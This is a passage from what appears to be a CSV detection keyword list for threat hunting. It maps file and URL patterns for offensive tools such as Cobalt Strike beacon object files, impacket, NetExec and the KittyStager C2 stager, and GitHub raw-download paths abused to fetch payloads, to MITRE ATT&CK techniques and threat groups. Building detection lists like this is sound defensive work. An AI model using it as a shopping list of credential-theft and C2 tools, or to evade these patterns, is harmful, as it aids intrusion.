T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/get-desc-users.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/getLegit/cdnl*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. 
It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*/getLegit/grkg*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*/getLegit/prvw*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*/getLegit/qhwl*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*/getLegit/tsom*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. 
It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*/getLegit/zijz*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*/get-loggedon/*.c*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" +"*/get-shucking.php*","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","36","4","2023-02-02T10:40:59Z","2023-01-27T07:52:47Z" +"*/getST.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/get-system/getsystem.c*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - 
T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" +"*/GetWebDAVStatus_BOF/*","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","10","10","81","18","2021-09-29T17:40:52Z","2021-09-29T17:31:21Z" +"*/ghidra*","offensive_tool_keyword","ghidra","Ghidra is a software reverse engineering (SRE) framework created and maintained by the National Security Agency Research Directorate. 
This framework includes a suite of full-featured. high-end software analysis tools that enable users to analyze compiled code on a variety of platforms including Windows. macOS. and Linux. Capabilities include disassembly. assembly. decompilation. graphing. and scripting. along with hundreds of other features. Ghidra supports a wide variety of processor instruction sets and executable formats and can be run in both user-interactive and automated modes. Users may also develop their own Ghidra plug-in components and/or scripts using Java or Python.","T1057 - T1053 - T1564 - T1204 - T1083","TA0002 - TA0011 - TA0008","N/A","N/A","Frameworks","https://github.com/NationalSecurityAgency/ghidra","1","0","N/A","N/A","10","43256","5253","2023-10-04T16:39:02Z","2019-03-01T03:27:48Z" +"*/ghostfile.aspx*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*/GhostInTheNet.git*","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","1","N/A","7","4","359","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" +"*/GhostInTheNet.sh*","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","1","N/A","7","4","359","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" +"*/GhostInTheNet-master*","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The 
Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","1","N/A","7","4","359","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" +"*/ghostscript/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/gimmeSH.sh*","offensive_tool_keyword","gimmeSH","gimmeSH. is a tool that generates a custom cheatsheet for Reverse Shell. File Transfer and Msfvenom within your terminal. you just need to provide the platform. your Internet protocol address and your port number.","T1059 T1505","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/A3h1nt/gimmeSH","1","1","N/A","N/A","2","168","27","2021-08-27T03:12:15Z","2021-08-02T07:22:15Z" +"*/giop-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com*.exe?raw=true*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/archive/refs/tags/*.zip*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.7z*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.apk*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.app*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.as*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve 
payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.asc*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.asp*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.bash*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.bat*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.beacon*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.bin*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.bpl*","greyware_tool_keyword","github","Github raw access content - 
abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.c*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.cer*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.cmd*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.com*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.cpp*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.crt*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.cs*","greyware_tool_keyword","github","Github 
raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.csh*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.dat*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.dll*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.docm*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.dos*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.exe*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" 
+"*/github.com/*/raw/main/*.go*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.gz*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.hta*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.iso*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.jar*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.js*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.lnk*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive 
!","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.log*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.mac*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.mam*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.msi*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.msp*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.nexe*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.nim*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - 
risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.otm*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.out*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.ova*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.pem*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.pfx*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.pl*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.plx*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve 
payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.pm*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.ppk*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.ps1*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.psm1*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.pub*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.py*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.pyc*","greyware_tool_keyword","github","Github raw access content - abused 
by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.pyo*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.rar*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.raw*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.reg*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.rgs*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.RGS*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.run*","greyware_tool_keyword","github","Github raw 
access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.scpt*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.script*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.sct*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.sh*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.ssh*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.sys*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" 
